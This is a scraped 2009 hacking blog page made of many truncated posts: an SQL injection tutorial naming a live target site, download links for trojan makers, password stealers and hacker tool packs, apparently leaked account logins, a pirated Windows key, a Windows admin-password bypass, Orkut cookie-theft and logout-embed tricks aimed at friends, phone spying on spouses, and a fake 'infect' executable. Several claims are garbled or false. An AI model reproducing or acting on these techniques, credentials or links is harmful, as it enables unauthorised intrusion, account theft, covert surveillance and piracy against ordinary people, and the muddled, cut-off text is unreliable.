Ultra vnc - good hacking & remote descktop tool

Sunday, May 24, 2009 , Posted by lankanatha at 10:07 AM
`


UltraVNC is a powerful, easy to use and free software that can display the screen of another computer (via internet or network) on your own screen. The program allows you to use your mouse and keyboard to control the other PC remotely. It means that you can work on a remote computer

Web Directory PRO Remote Database Backup


---------------------------------------------------------------
Web Directory PRO Remote Database Backup Vulnerability
---------------------------------------------------------------
Founder :TiGeR-Dz
Home:http://www.h4ckf0ru.com
Script:Web Directory PRO

Ultimate method for Website Hacking

Welcome to my very first tutorial for SQL Injection on Genius hackers. SQL Injection basically means to execute a query in the database which is connected to the website to get personal information out of it, which is not visible to a normal user. Database is most likely to be a part of the websites, which saves all the information like user names, passwords, posts, replies in it. So there is a possibility that you might put some commands or queries or requests whatever you want to call it into the database to get some hidden information out of it.

It is noticed that in the past SQL Injection have been used several times to steal the credit card information, E-mail address and passwords, because most of the users have same E-mail address and passwords into all of their E-mail accounts. So if you manage to hack one of the accounts, you may just get access to all of their accounts. SQL Injection is most likely used by the “Penetration Testers” to check if the website of their clients are vulnerable to some kind of attacks to steal the information. Here, in this article I will show you how do they do it. There are some simple terms expected out of you and one of them is that you understand the basic knowledge of the computer. This tutorial will let you know, how to start? where to stop? what to do? and if you have any further queries you can post them here and i will help you to work with it.

PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility of whatsoever damaged is made by you by this knowledge. This is just for the educational purposes so you can secure your own website.

I will divide this tutorial into some points so it can help you in a better way to understand the structure of the SQL Database which is working at the backend of the website to store, save and execute the information.

I will use a LIVE website in this tutorial, so you can try to test it on your own and believe me it really helps to develop your skills.

The website that I will use today is www[dot]rfidupdate[dot]com.

To understand what is an SQL Database, the very simple thing i can explain to you is the “website where you can register, login or create your own profile. Because it will save the data you input into your profile and will execute / display them whenever you provide the correct username or the password. So in the same way the website i mentioned above will give you a chance to be a part of it, it will update you daily about respective news.

1. How to check if the website is vulnerable to SQL Injection?
A: On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to

Net tools all in one (best tool for hacking it include almost200 tool

http://rapidshare.com/files/50221899/40_Hack_tools_may_2006.part2.part1.rar
http://rapidshare.com/files/50222295/40_Hack_tools_may_2006.part2.part2.rar
http://rapidshare.com/files/50222617/40_Hack_tools_may_2006.part2.part3.rar

*******************************END***********************************

Latest Hacking Tools

Password Hacking AIO
PROXY TOOLS
PROXYHUNTER CHARON
PROXYRAMA
A.P.L
FORUM PROXY LEECHER
AA TOOLS
WORD LIST TOOLS
ATHENA
PARSLEY
RAPTOR
VLSTRIP
LOG SUCKER
S WORDTOOL
VCU
ALS NOVICE
STAPH
HORNY STRIPPER
XXX PASSWORD FINDER
CRACKING TOOLS
ACCESS DIVER
SENTRY
CFORCE
XFACTOR

Dictionary in your Mobile



















DOWNLOAD

*******************************END***********************************

Magic Bluetooth Hack

















DOWNLOAD

*******************************END***********************************

Yahoo in your Mobile




















DOWNLOAD

*******************************END***********************************

Speed Up Ur PC 70% More faster !




Speedup You Pc 70% - Free videos are just a click away

To download the program
Download

*******************************END***********************************

Rapid Share Premium Accounts july 2010

login: obnaxious
pass: sevda01

username = 6988408
Password = pNBpxxfYb8
Expiration date = Mon, 26. Oct 2009
Traffic left = 12000 MB
Security = Secured

Username = 84858
Password = 60458655
Expiration date = Thu, 17. Sep 2009
Traffic left = 12000 MB
Security = Secured

Username = 6436269
Password = HUy8MW3aG3
Expiration date = Thu, 10. Sep 2009
Traffic left = 12000 MB
Security = Secured

Username = bmdylg
Password = b1m2d3ylg
Expiration date = Thu, 6. Aug 2009
Traffic left = 10883 MB
Security = Secured

Username = 5875548
Password = tKy2xhNvCR
Expiration date = Fri, 17. Jul 2009
Traffic left = 12000 MB
Security = Secured


Login: 329027
Password: 787287

Login: crazylf1111
Password: iori0362764266

Login: madob
Password: 6971750

Login: tcfy
Password: 6936746

Login: 7816771
Password: hemo1234

new - working!!!
login: 4575252
password: Godzilla

login: 438401
password: g6zqs

login: 187336
password: 455438

Self Destructing Email

Send Email in Mission Impossible Style


You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?


Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email


Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that

Incredible Proxy List(350+ Sites)

Many schools, universities, offices, ISPs and countries like Saudi Arabia, China, Pakistan, Burma, Iran, North Korea, Vietnam ,Cuba, Syria, Tunisia ,Uzbekistan, Egypt, Belarus and Turkmenistan don't allow their surfers to access some web sites which them deem inappropriate.

Here is a list of Some proxy sites from my Incredible List of 350+ Proxy Sites which let you surf any web site. If you want that incredible list just write a comment to this article and I ll Email you that List.


http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.cheekyproxy.com
http://www.funkyproxy.com
http://www.surfsneaker.com
http://www.proxii.com
http://www.proxynumber1.com (Replace 1 with any number between 1 to 10) http://myspaceproxyy.com
http://tenpass.com
http://www.browsesneaky.com
http://www.proogle.info http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.slyuser.com/
http://pawxy.com
http://pawxy.org
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net

If Orkut Blocked..Surf Anonymously using JAP!!

No problem if orkut/youtube etc is blocked in your office or college or school….and you are fed up of using proxy websites and there low urfing speeds.And what worse if these proxy websites are also blocked…..phew!!!!
But no problems….. Download JAP & Download Ultrasurf and easily surf any blocked website with anonymity

Step 1: Download JAP or ultrasurf
Step 2: Execute Setup file [may take few minutes depending upon internet speed]
Step 3: Change you Explorer LAN connection settings

Change the default gateway IP to 127.0.0.1 and port 4001

Thats it you have gained independence to free to surf any website….

jap1.jpg


*******************************END***********************************

Crack windows passwords

There’s a way to crack the password and it doesn’t involve reformatting and reinstalling Windows. The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I’m going to let you in on a program called LC5. Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks. LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer. The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP. I haven’t tested it against Windows Vista yet, so I’m not sure if it will work. Your mileage may very either way. How it works: Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute. Eventually the correct password will be sent and

Breaking Administrator’s Password!!

Administrator password can be broken by replacing sam file in system32\config by the sam file in repair folder of windows. it can be easily done on a machine with dual operating systems, simply log on to os other then the one whoes password is to be cracked the way is exactly same as written above but if there is a single os on a machine then there is only one way i.e to use ms dos start up disk or some other boot disk and replace the

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number.Do you think I am crazy? No, I am not…….
Just try the following steps and you’ll get a call to your cell phone from your own number.
1. Just give a missed call to this number.You’ll not be charged!

+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number
3. Receive the call.You’ll hear a lady voice asking for a PIN number.Just enter some rubbish number.
4. She say’s- Your PIN cannot be processed and the call disconnects..

ANOTHER TRICK

Instead of giving a missed call, just continue calling.The call will not be received and will get

Is your Nokia Cell Phone Original


Nokia is one of the largest selling phones across the globe.Most of us own a Nokia phone but are unaware of it’s originality.Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially

Cell Phone Spy – How to Spy on a Cell Phone



Cell Phone SpyAre you curious to know how to spy on a cell phone? Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.
Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you need to know the following facts.
1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the cell phone spy software.
2. Cell phone spy softwares are compatible with the following type of phones (operating systems).
1. Symbian OS (Most Nokia Phones)
2. Apple iphone
3. Windows Mobile
For a complete list of compatible cell phones visit the Mobile Spy site and click on Compatiblity link present on the left hand sidebar.
Today most of the modern cell phones are loaded with one of the above three operating systems and hence compatibility doesn’t pose a major problem. There exists many cell phone spy softwares

Speed Up PC – Top 5 Ways to Speed Up Your Computer

5 Best Ways to Speed Up your PC

Speed Up PC
Are you fed up with your slow PC? Well you can Speed Up your PC by 3 times. In this post you’ll find some of the most significant ways to speed up your PC. For your convenience, I ’ll split this post into 2 parts.
1. Automatic Ways to Speed Up PC (Using PC Speed Up Softwares)
2. Manual Ways to Speed Up PC

Automatic Ways to Speed Up PC

You can use a PC Optimizer Tool to automatically boost the Speed of your PC without the need to worry about the manual ways of doing it. These tools will automatically find and fix upto 99% of your PC errors by optimizing the Windows registry, cleaning up junk files, removing unwanted items from the start up etc. This can speed up your PC and Internet speed by upto 3 times. Here are some of the best PC Optimizer Programs that I recommend.
1. Perfect Optimizer
2. Registry Easy
Using a PC Optimizer is the easiest way to speed up your PC. This is because, most of the performance tweaks such as Registry Cleanup cannot be done manually.

Manual Ways to Speed Up Your PC

1. Free Up Disk Space to increase the speed of your PC
  • Remove temporary Internet files.
  • Empty the Recycle Bin.
  • Remove Windows temporary files.
  • Uninstall Programs that you no longer use.
2. Periodically Perform Hard Disk Defragment. This can Speed Up your PC significantly.
3. Clean Up your Registry (Highly Recommended)
Cleaning Up your Windows Registry is very much necessary to speed up your PC. Unfortunately

Notepad tricks

You might be using Notepad since long but there are few tricks which are still unknown to you.

There few tricks which you can use in notepad. Well quite old but here is d complete collection

Step 1: Open Notepad
Step 2: Write following line in the notepad.

this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.

Voilla!!

or

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

or

1> Open a note pad
2> Type Bush hid the facts
3> Save that file,
4> Close it
5> Again open and see...

NOTEPAD "world trade centre trick".. :


Did you know that the flight number of the plane that had hit WTC ...on 9/11 was Q33N ....Open your Notepad in ur computer and type the flight number i.e Q33N... Increase the Font Size to 72, Change the Font to Wingdings. U will be amazed by the findings.

log trick !! make ur Notepad a diary !!


Sometimes we want to insert current data and time, whenever we o

How To Change Your Ip In Less Then 1 Minute

This article will help you to change your IP address within a minute. Just follow the following step and you will be thru.

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with

Format a HDD with Notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.



Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR


IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives

Hack your friends Internet Password

This is Really Amazing. I was moving through my Browser's settings and found the file where all the passwords are stored. I was really shocked that it allowed me to have a look at all the Username and Password which I had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox.

To Hack your friends Password you only need even less than a minute and

How to fix corrupted files in XP

Sometimes when you are executing some program an error comes saying that your xxx file is corrupted so we can not run your program and your whole work is left pending due to that error. Now this problem will not arise because I will show you how to fix these

sub7

If you haven't heard of Sub7, I suggest you leave now, find out what it is, then come back. Stop wasting my time. If you think you have the skilled mind for it, stick around, and I will introduce you to one of the many essential tools hackers have ready at all times.

Origin

Sub7 was invented in the late 1980's by a legend known as Mobman. Mobman wanted to make the basic tasks of a hacker easily accessable and easy to implement. I'm not sure what exactly he programmed it in, but it was probably something extremely difficult and involved, like Visual Basic or A+. I read up on Mobman, no one knows of his whereabouts and some even claim that he is dead (real hackers know better). Either way, we can all thank Mobman for this great program.

What it is

Sub7 is a R.A.T (Remote Administration Tool) that basically has two parts: a client, and a server. After you have the server installed on another machine, or trick another person into installing the server

NetBios Hacking

For this tutorial, I used Microsoft’s Windows XP Home Edition OS.

What is it?

NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

How can this be of useful to me?

Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

What do I need?

Windows OS
Cain and Abel

CODE
(http://www.oxid.it/downloads/ca_setup.exe)

--------------

So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross







Another window will pop up, make sure “All host in my subnet” is

Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

sql hacker fig1

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products

How to Hack Windows XP Admin Password

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos



Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when t

Hack Computer Through MSN

Introduction

In this tutorial, you will learn how to access a computer's friend through a simple conversation on MSN. Its quite easy, but most people consider the contents of this document to be more of a 'script kiddie' actions.

Script Kiddie : n00b-hackers who consider themselfes to be powerful because of the tools they have obtained rather then the hard powerful way real hackers use.

But anyways, script kiddies <3> Run... and type 'cmd.exe', type 'netstat -n' whilst sending the file and you will have a list of IP addresses. The first few are yours, now scroll down, and you see his 'foregin IP', write it down on a paper.

Yeah! You got his fricken' IP address! Now, lets perform our hacking!

Hacking Operation

Okay, well you know your friend's IP address. Aint that great? Lets

How to Hack into Forums

This is what you like to call "Hacking a forum".

I call it "Cracking into a forum" ... Learn what hacking means you lazy fucks, lol...

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as "hackingsite".




So you've got your target. You know the forum to want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member

Increase Fans ( Working Code ) Really Amazing

Follow the steps:

1) Create a fake account or simply login with ur friends Id.. and add yourself as a friend there.

2) Visit the FRIENDS page by logging into your just created fake account or the Friends account.

3) Point your cursor on the fan icon () beside your real profile. Note your status bar. It should be showing something like javascript:setKarma('FRUS*******/US*******'). Note the code FRUS******* and US******* somewhere. Now, click on the star so as to make your fake account

A Java Trick that Pops Message " Ur Account Is Hacked"

javascript:function reverse() { var inp = "kihsA yb dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();

copy and paste d Above link On Address Bar.. n replace "luhaR" by ur own Name.. n send it to ur friends

Scrapbook refresher ! make ur own

Easy trick for u guys.. m happy to share it wid d worldhave seen many places u need to download stuff like this
why dont u do it urself. it just takes 2 minutesm not kiddin
This Scrapbook Auto Refresher trick refreshes your scrapbook for every few seconds.


The default timer is set as 30 seconds.

If you want to change the default timer, follow the steps below.

1) Copy the code below in Notepad
2) Select 'save as'.
3) Save it as scrapbookrefresher.html
4) The code gets saved in ur default browser application, now view source.
5) Observe the 6th line ( )
6) Change the number "30" in the above line to the number of seconds you want.
7) Save the file by selecting File -> Save.
8) Close the notepad.
9) Double click (Opens in your Internet browser) on the scrapbookautorefresher.html fileto refresh your scrapbook for every few

See All Pictures Of Album In Fullsize At A Time !!

Use This CODE:

javascript:d=document.body.innerHTML; m=d.match(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi);

for(z=0;z")};void(0)

*Method To Use*
Open Andbody's Album You Want To SeeJust Paste This CODE & (Press Enter)or(GO)it works

~cheers ~

How To Block Unwanted Scraps on Orkut

Oh my God! I never thought Orkut would even give consideration to the feature that they have finally implemented now. Orkut was always looked down upon when compared to other social networking websites due to its low privacy features and security holes which could get your Orkut account hacked or even cause you to lose some very personal information but the recent addition of a new feature to the Orkut system shall now ensure that Orkut will be safe enough to compete with other social networks like Facebook and MySpace.

How To Block Unwanted Scraps on Orkut

“Friends and Friends Only Scraps” (Thats what I call it) is a new feature that has been recently added to the Orkut system and will ensure that you get scraps only from the people you trust i.e. friends and family etc. This will block all unwanted scraps in your scrapbook from people who usually used to spam you or irritate you for no reason. The new great feature will make sure that you don’t get links to any malicious scripts and websites and will also prevent unknown people from writing something abusive or unethical on your

How To Block Unwanted Scraps on Orkut

Oh my God! I never thought Orkut would even give consideration to the feature that they have finally implemented now. Orkut was always looked down upon when compared to other social networking websites due to its low privacy features and security holes which could get your Orkut account hacked or even cause you to lose some very personal information but the recent addition of a new feature to the Orkut system shall now

Home Orkut Hacks

As I'm Orkut user I like these sites and Orkut hacks on it, the following are some of my collection regarding Orkut hacks

1) Zeetab(Orkut Star) - Computer World, Orkut Computer Tips and Tricks, Free Sms, Wallpaper, Mobile Software Game Ringtone Themes, Free games, Orkut Software, Bollywood wallpaper, MP3, FM Rradio and many more

2) Thisisorkut.org (TIO) - This Is Orkut (T.I.O) was created to provide more info and help tracks to Orkut users for their convenience. Easy to use Java Scripts, Online Toolbars, Help References, Trouble shooters, and lot more....

3) CrazySouls.com - Crazy souls have created many orkut scripts and they are really useful and working. Not only scripts they also profide stuffs for MSN, Cheets and many more

4) Trickfriend.com - Here, on this website, you will find tips and tricks that will help in making your life easier on Orkut. This webpage also contains many sftware related to Orkut

5) Tools Home - This site is developed by 15 yr Old boy, this site contains

Hack Orkut Accounts

First get firefox and the cookie editor plugin for it...u will need them...
Then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real

Block your friends scrapbook - ORKUT

It will be really scary when you will find out that you are not able to reply to your friends scrap from your own scrapbook. Yes this hack can be used to block anybody's scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him. Really cool!



Copy this and paste in your friends scrapbook.


<embed src="http://www.orkut.com/GLogin.aspx?cmd=logout" height="1" width="1"></embed>


When that man will enter his scrapbook he will be at the login position .he cant reply from his scrapbook

What to Do when Ur Orkut is Hacked!



It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.

Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account

Orkut Hacking

What to Do when Ur Orkut is Hacked!

Saturday, December 29, 2007



It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.

Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:










Links to this post

Block your friends scrapbook - ORKUT





It will be really scary when you will find out that you are not able to reply to your friends scrap from your

Hide-disable-remove-blogger navbar from your blog

Learn how to hide,disable or remove the blogger navbar(navigation bar) from your blog.
First,let us see what blogger navbar is:




blogger navbar

Blogger navbar allows users to easily navigate to other random blogs and it also has a feauture to search the blogs ,and mark any blog as spam.
So,now you have a clear idea of what really a blogger navbar is.So, why so many people prefer to just remove the navbar inspite of the feautures it has like search,etc.Many people think that, it spoils the look of

How-to-embed-YOUTUBE video,movie in your blog

This post explains, how to embed(insert) a youtube video in your blogger blog:
So,you want to embed a video(movie) onto your blog.The process is very simple,even a dummie can do it.If you want to embed your original video,then first sign up for an account in youtube and upload your video and get the embed code.
Otherwise,you can easily embed any public youtube video in your blog.Go to youtube.com and search for the video.For example,if you want to embed a britney spears video,search it and copy the embed code on to a

"Email Me" html/javascript code for your blogs,web pages

How to add a "Email me" link on your blog?

Adding the "Email me" link to your blog/webpage is very helpful for the visitors who want to contact you.It increases the interactivity between the visitors and your site and make them come regularly.

Hi Kranthi! I will write the email address directly like abc@gmail.com and ask visitors to contact me.So,why to add these clickable links like"Email me" ?
There are plenty of problems if you show your email address directly on your site as SPAMMERS find your email address easily via search engines,and other sources.
So,by adding this type of links will hide your email address and If your visitors want to contact you,they will

Top 5 Ways to get Free One Way Backlinks to your site

How to get Free One Way backlinks to your site
One way backlinks are very critical to any website success. The more one way backlinks pointing to your site, the more your Google Pagerank and the more amount of traffic you will get. This should also increase your sales,etc.
But the thing is.. getting the right and quality one way backlinks from high pagerank sites is not an easy task, and in this article, we'll find out some of the best ways to get free one way backlinks:

1. Try to write as much quality content as you can... that will encourage the readers to link to your site. The more useful, informative content you post, the more likely people are to link it. But, this method can take a while to really pay off because like all the new

ULTRA HACKER PACK 156 IN 1

AddrView
AnonFTP
AOL new
AppToService
arpinject
aspack21
Astaroth Joiner v2
atk-2.1
BankOfAmerica
bios_pass_remover
BlasterW32
blue
bmpripper
brutus
Cable Modem Sniffer
CapKeys_DIGITAL
CASXM138
CAYZODQF
CGI Founder v1.043
cgis4
CGISscan
cia10
cports
craagle
Crackftp
CreditCardGjenerator
Davs_TR_REtail
DDL Sites
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker
ezDataBase_Defacer
F.B.I – Binder
FTP Brute Forcer
ftpbr
Fuck Mail Bomber 2.3
G00B3RS_phpBB_exploit_pack
genxe-beta-0.9.0
Google_Hacker_1.2
grinder1.1
Hack FLASH Template
Hack MY Space
Hack Photoshop CS2.
HackersAssistant
HackTheGame
hck
hlboom
Hook Tool Box.
Hotmail Email Hacker
Hotmail HAcker Gold
Hotmail ScamPage
HotmailHack
HSBC-US
hydra-4.6-win
iecv
IP2
ipnetinfo
john-17w
Key Changer
Key_Logger
Legion NetBios Scanner v2.1
Mail Boomb_2.0 YAHOO
MIDNITEmassacre
MooreR Port Scanner
MSN Flooder 2.0

Downlaod CRACK SEARCHING SOFTWARE

http://rapidshare.com/files/50225712/Crack_Searching___Shareware_Ha.softarchive.net.part1.rar
http://rapidshare.com/files/50227224/Crack_Searching___Shareware_Ha.softarchive.net.part2.rar

DOWNLOAD TROJAN MAKER

http://rapidshare.com/files/50236645/TROJANS.rar

Downlaod DATABASE HACKER

http://rapidshare.com/files/50236419/The_Database_Hacker_s_Handbook.rar

Downlaod webcam grabber

http://rapidshare.com/files/50240767/webcamgrabbersimple.zip

Downlaod YAHOO HACKING STUFF

http://rapidshare.com/files/50241645/yahoo_hacking_stuff.rar

Downlaod YAHOO MESSENGER PASSWORD SHOW

http://rapidshare.com/files/50241756/Yahoo_Messenger_Password_Show_V2.rar

Downlaod YAHOO PASSWORD STEALER

http://rapidshare.com/files/50241854/yahoo_passward_stealer.rar

Download HACKER DELIGHT EBOOK (video)

http://rapidshare.com/files/50228433/HD.rar


VIDEO OF Local_Password_Cracking_Presentation_for_the_Indiana_Higher_Education_Cybersecurity_Summit_2005 http://rapidshare.com/files/50228889/Local_Password_Cracking_Presentation_for_the_Indiana_Higher_Education_Cybersecuri

Download HACKING BOOKS AND TUTORIALS

http://rapidshare.com/files/50228314/hacking_books_and_tutorial.rar

Download hacking books

http://rapidshare.com/files/50224916/10_Usefull_Hacking_eBooks.rar

Download TOOL TO HACK MODEM

http://rapidshare.com/files/50228170/Hack.Modem.v6.rar

Download ARABIAN HACKER ATTACKER CD

http://rapidshare.com/files/50223129/Arabian_Attacker_Hacker_s_CD_V.1.0.part1.rar
http://rapidshare.com/files/50223740/Arabian_Attacker_Hacker_s_CD_V.1.0.part2.rar
http://rapidshare.com/files/50224341/Arabian_Attacker_Hacker_s_CD_V.1.0.part3.rar
http://rapidshare.com/files/50224616/Arabian_Attacker_Hacker_s_CD_V.1.0.part4.rar

Free Tools For Hacking

CrackersKit 2005
Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer’s NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online – Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer

http://rapidshare.com/files/50220724/40_Hack_tools.part1.part1.rar
http://rapidshare.com/files/50221144/40_Hack_tools.part1.part2.rar
http://rapidshare.com/files/50221457/40_Hack_tools.part1.part3.rar

softice 4.05 win2000-xp
patchs all in one 2005

nfo-tools all in one

Make your Windows Xp Copy 100% Genuine!

Making your copy of windows genuine..works perfect making your copy of windows genuine many of you might have tried windows update and found out that your copy of windows is not genuine…here’s how to make your copy of windows genuine…download jellybean keyfinder from here:
http://www.magicaljellybean.com/beta/

Now open keyfinder.exe Click on options and click “change windows key”Now enter this key and you’re done.
*******************************************************
V2C47-MK7JD-3R89F-D2KXW-VPK3J
*******************************************************

How to Access Banned Websites

Surfing at school? Parents enabled website blocking? Stuck behind a strict firewall? There are lots of ways around the problem so that you can get to the sites you want to see without those cybernannies tying your hands…
phproxy is “dedicated to bringing you fast web browsing from behind web filters”. Simply tap in the URL of that banned site you really must see, it could be Facebook, MySpace, Youtube, or a renegade blogger behind enemy lines, and you will be able to access it with no problems. More seriously, the proxy allows you to visit a site anonymously because it is the proxy itself that is visiting the banned site not you, and so keeps your browsing hidden from prying eyes allowing you to protect your online identity.
Such a proxy also allows you to visit sites that have banned your IP. This might be a forum or just a website or blog from which you or other users on your IP range (whether on your school or company network or your ISP account) have been barred access. The proxy server is an open gateway between your web

How to Lock the folders

folder1.jpg
You can lock and unlock your folder with this simple trick !
Procedure :
1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ’save as’ name it as lock.bat and click save ! (Save it on Desktop)
